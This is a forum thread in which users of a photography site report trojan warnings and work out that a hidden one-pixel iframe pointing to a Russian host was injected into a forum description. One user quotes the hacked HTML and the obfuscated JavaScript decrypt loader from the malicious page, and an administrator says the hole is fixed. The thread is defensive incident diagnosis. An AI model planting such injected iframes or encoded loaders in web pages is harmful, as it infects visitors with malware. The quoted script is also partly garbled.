Trojan Horse Warning

[Jack Flesher]

FWIW -- My virus detector signals a trojan horse virus every time I log into the user forums...

[schaubild]

Same with me. The site tries to run a file named load.exe...  

[francois]

With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.

[Peter McLennan]

With Safari, the page closes as soon as it's loaded! Clearing the cache and cookies helps. This started about 20 minutes ago.

Edit: I've been able to load the initial forum page a few times without Safari closing the window.
[a href=\"index.php?act=findpost&pid=51780\"][{POST_SNAPBACK}][/a]

This morning I'm getting a blocked popup warning when I go to "view new posts".  Never seen that here before.

Peter

[Concorde-SST]

Hello -

I´m from Europe and I never had such problems
with this website.

I´m using mac with safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.

[Gary Brown]

In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.

[Ben Rubinstein]

Yup, I've been getting that, I've had my virus program block it but it still opens an empty window and tries to load the link Gary mentioned.

[francois]

Hello -

I´m from Europe and I never had such problems
with this website.

I´m using mac with safari (latest version, popup-blocker on).

Might be good to check your firewalls etc.?!

best,

Andreas.
[a href=\"index.php?act=findpost&pid=51784\"][{POST_SNAPBACK}][/a]

I'm also in Europe and using a Mac with Safari. As soon as the forum page loads, Safari closes the window. I tried to clear the caches & cookies and it helped somewhat but now it does it again.
     

[francois]

In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with

     src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"

which apparently tries to load some trojan stuff.
[a href=\"index.php?act=findpost&pid=51785\"][{POST_SNAPBACK}][/a]

If I load the offending url, Safari (on the Mac) closes the window immediately. Using curl shows the hacked  source leading to the Russian address.

"Hacked" LL forum source:
<td class="row2"><b><a href="http://luminous-landscape.com/forum/index.php?amp;showforum=1">Landscape &amp; Nature Photography</a></b><br /><span class="forumdesc">Nature Photography ? technical and esthetic issues<iframe src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"<br /><br /><i></i></span></td>



"Russian" page source:
<script language=JavaScript>
function decrypt_p(x)
{var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,58,7,61,18,40,43,41,34,6,0,0,0,0,0,0,25,22,31,49,36,26,16,5,47,50,57,
45,14,33,15,8,12,2,20,27,53,30,42,9,0,1,29,0,0,0,0,48,0,54,60,59,28,10,35,55,62,3
9,3,21,52,4,38,24,13,17,23,37,51,19,44,11,32,46,56);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write®}}decrypt_p("Gn7CXHdlXB3n@Ubnb6PlGIU3GIvTGUdIeSvtX2PMm4oneUbn@V5CXHdlXB3n@EKCrtdTqroImHv
_Fuv_XfJtmNpCASbTPrZlGE3T9f7xWtbCeEdIeSp_whvTQy@neEKCrtdTqHW")
</script>

[Mark Guertin]

Thanks guys.

This has been fixed.  Someone found a way to trigger an unwanted password reset.

So no more trojan and I'm looking into how the password reset was triggered so they can't use this method to gain access any longer.

Mark

P.S. Thanks for the extra info in this thread, made it much easier to track down as I'm also on Safari on a Mac